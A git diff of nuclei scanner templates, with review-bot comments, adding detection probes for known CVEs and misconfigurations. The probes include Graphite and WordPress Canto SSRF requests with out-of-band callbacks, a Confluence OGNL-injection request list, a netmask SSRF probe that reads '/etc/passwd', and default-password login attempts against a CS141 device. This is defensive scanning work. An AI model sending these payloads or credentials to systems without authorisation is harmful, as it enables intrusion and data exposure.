diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml new file mode 100644 index 0000000000..bf1abb9b15 --- /dev/null +++ b/cves/2017/CVE-2017-18638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-18638 + +info: + name: Graphite 'graphite.composer.views.send_email' SSRF + author: huowuzhao + severity: high + description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + tags: cve,cve2017,graphite,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 7b9df06171..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index e2a6243b8b..3c31a10ae9 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml 
@@ -8,6 +8,8 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml new file mode 100644 index 0000000000..00e084429e --- /dev/null +++ b/cves/2020/CVE-2020-28976.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: high + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index a4df4fd3d9..e4043100bf 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml 
@@ -13,9 +13,6 @@ info: - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage -# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. -# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - requests: - method: GET path: diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml new file mode 100644 index 0000000000..e018f535d1 --- /dev/null +++ b/cves/2021/CVE-2021-22145.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-22145 + +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + tags: cve,cve2021,elascticsearch + +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + + matchers-condition: and + matchers: + + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + + - type: status + status: + - 400 diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index c37f54cd81..1ef19a23c1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml 
@@ -1,25 +1,40 @@ id: CVE-2021-26084 info: - author: dhiyaneshDk + author: dhiyaneshDk,philippedelteil severity: critical name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. tags: cve,cve2021,rce,confluence reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 requests: - raw: - | - POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + POST /{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features + + stop-at-first-match: true matchers-condition: and matchers: - type: status 
@@ -29,4 +44,4 @@ requests: - type: word part: body words: - - 'value="aaaa{140592=null}' \ No newline at end of file + - 'value="aaaa{140592=null}' diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml new file mode 100644 index 0000000000..d591e23f66 --- /dev/null +++ b/cves/2021/CVE-2021-28918.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-28918 + +info: + name: Netmask NPM Package SSRF + author: johnjhacking + severity: critical + description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + tags: cve,cve2021,npm,netmask,ssrf,lfi + reference: + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r + +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Apache Server Status" + - "Server Version" + condition: and + + - type: regex + regex: + - "root:.*:0:0:" diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..531ed5ae2d --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml 
@@ -0,0 +1,65 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' 
diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..aef6738399 --- /dev/null 
+++ b/misconfiguration/http-missing-security-headers.yaml 
@@ -0,0 +1,127 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: misconfig,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" + negative: true + part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" + negative: true + part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" + negative: true + part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" + negative: true + part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" + negative: true + part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" + negative: true + part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" + negative: true + part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" + negative: true + part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" + negative: true + part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" + negative: true + part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" + negative: true + part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" + negative: true + part: header 
+ + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" + negative: true + part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" + negative: true + part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" + negative: true + part: header + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml 
@@ -2,31 +2,39 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index aefceea0d0..1b441eeeef 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml 
+++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. reference:
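Review bot: in cves/2017/CVE-2017-18638.yaml the request supplies a random `to=` address, and the description itself says the fetched response "is then sent to an e-mail address", so every scan that reaches the endpoint makes the target attempt an outbound mail to a random domain. That side effect deserves a sentence in the description or a comment above `path`; operators pointing nuclei at production Graphite instances will want to know it. The `interactsh_protocol` / `http` matcher is the right choice here, since a DNS-only interaction would not prove that the fetch actually happened.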
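Review bot: in cves/2020/CVE-2020-28976.yaml the description reads "It allows an unauthenticated attacker can make a request to any internal and external server"; rewrite it as "It allows an unauthenticated attacker to make requests to arbitrary internal and external servers via `/includes/lib/detail.php?subdomain=`". The name should also use the product's spelling, `WordPress`, to match the `wordpress` tag.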
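Review bot: in cves/2020/CVE-2020-7209.yaml the two removed comment lines are the only text in the hunk that records the affected version (LinuxKI Toolset <= 6.01) and the sink (the `kivis.php` `pid` parameter reaching `shell_exec`). Unless `info.description` already says this, move those sentences into the description instead of deleting them; a template with only a name and a reference list tells an operator nothing about why a match means RCE.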
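Review bot: in cves/2021/CVE-2021-22145.yaml the tag `elascticsearch` is misspelled and will not be selected by `-tags elasticsearch`; change it to `elasticsearch`. The matcher logic is sound as written: any Elasticsearch answers the malformed `_bulk` body with a 400 containing `root_cause` and `reason`, so requiring `truncated` as well is what ties the match to the leaked parser buffer the description talks about rather than to an ordinary parse error.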
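Review bot: in cves/2021/CVE-2021-26084.yaml the `path` payload list carries the `confluence/` and `wiki/` context-path variants only for `pages/createpage-entervariables.action?SpaceKey=x`; the other nine endpoints are probed at the server root only. Because the request is `raw` with `Host: {{Hostname}}`, the path component of the target URL is not reused, so an install under `/confluence` or `/wiki` is tested against one endpoint instead of ten. Either add a second `prefix` payload (an empty entry, `confluence/` and `wiki/`) with `attack: clusterbomb`, or drop the two prefixed entries and document that the context path must be supplied by the user. The description also says unauthenticated reachability depends on the sign-up setting, while the template sends no session; a non-match on an instance that requires login therefore does not mean it is patched, and that limitation is worth a line in the description.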
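Review bot: in cves/2021/CVE-2021-28918.yaml the third path, `{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd`, expects `root:.*:0:0:` in the response, but it asks a loopback web server for `/etc/passwd` over HTTP, and a web server does not serve the filesystem root, so this probe will practically never match; drop it or document the server-side behaviour it assumes. More generally, guessing `url`, `host` and `file` on the site root is a generic SSRF probe: a hit proves an SSRF, not that netmask is in the filtering path, and a miss proves nothing, so `severity: critical` is hard to justify for the template itself (the CVE's own rating belongs in the description). A comment explaining why `0177.0.0.1` is used (netmask read the leading-zero octet as decimal 177, so a 127.0.0.0/8 deny list passes it, while the OS resolver treats it as octal 127) would help future readers.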
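Review bot: in default-logins/abb/cs141-default-login.yaml the `Content-Length: 44` header is hard-coded on all three raw requests, but only the first body is 44 bytes: `{"userName":"engineer","password":"engineer"}` is 45 bytes and `{"userName":"guest","password":"guest"}` is 39. Drop the header and let nuclei compute it, otherwise a strict server truncates the second body or waits on the third. Separately, the word matcher looks for `accessToken` in `part: header`; confirm the device really returns the token as a response header. If it comes back in the JSON body, the matcher needs `part: body` and the `kval` extractor, which is meant for header and cookie keys, should become a `json` extractor.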
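Review bot: in misconfiguration/http-missing-security-headers.yaml the negative matchers for `access-control-allow-origin`, `access-control-allow-credentials`, `access-control-expose-headers`, `access-control-max-age`, `access-control-allow-methods` and `access-control-allow-headers` report the absence of CORS headers, but absence is the safe default there: no `Access-Control-Allow-Origin` means no cross-origin reads, and a missing `Access-Control-Allow-Credentials` is exactly what a reviewer wants to see. The same goes for `clear-site-data`, which only makes sense on a logout response, not on a GET of `{{BaseURL}}`. Combined with `matchers-condition: or` this makes the template fire on practically every host and could nudge users toward adding permissive CORS. Suggest dropping those seven matchers and keeping the hardening headers (Strict-Transport-Security, Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, X-Permitted-Cross-Domain-Policies and the three Cross-Origin-* isolation headers). The description, "could be so less generic and could be useless for Bug Bounty", is not clear English; "Checks for missing HTTP security headers; results are informational and noisy by design" says the same thing. The file also lacks a trailing newline (`\ No newline at end of file`).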
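Review bot: in misconfiguration/php-errors.yaml several of the new extractor regexes are too broad to count as evidence of leaked PHP errors: `(?i)include_path`, `(?i)undefined index`, `(?i)stack trace\:`, `(?i)Debug Trace` and `(?i)(syntax|parse) error` match any page that merely talks about PHP or JavaScript, such as documentation or a forum thread, and because the matcher block was removed every extractor hit is now reported. Anchor them on what PHP actually emits, for example `Warning: include(` with `include_path=`, `Notice: Undefined index:`, `Parse error: syntax error` and `Stack trace:` followed by `#0`, or keep the old word matcher as a gate and use the extractors only to surface the matched text.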